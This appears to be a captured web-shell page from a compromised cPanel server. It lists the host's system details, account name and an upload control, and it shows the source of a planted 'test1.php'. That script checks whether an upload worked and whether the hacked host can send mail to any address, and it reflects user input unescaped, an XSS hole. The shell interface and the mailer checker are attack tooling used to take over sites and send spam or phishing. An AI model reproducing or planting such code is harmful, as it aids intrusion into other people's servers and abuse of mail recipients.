HEX
Server: Apache
System: Linux srv10.cpanelhost.cl 3.10.0-962.3.2.lve1.5.88.el7.x86_64 #1 SMP Fri Sep 26 14:06:42 UTC 2025 x86_64
User: cco26461 (4967)
PHP: 7.4.33
Disabled: NONE
Upload Files
File: /home6/cco26461/public_html/test1.php
<?php
error_reporting(0);

?>
Upload is <b><color>WORKING</color></b><br>
Check  Mailling ..<br>
<form method="post">
<input type="text" name="email" value="<?php
print $_POST['email']?>"required >
<input type="submit" value="Send test >>">
<br>

</form>
<br>
<?php
if (!empty($_POST['email'])){
	$xx = rand();
	@mail($_POST['email'],"Result Report Test -
".$xx,"WORKING !");
	print "<b>send an report to
[".$_POST['email']."] - $xx</b>"; 
}
?>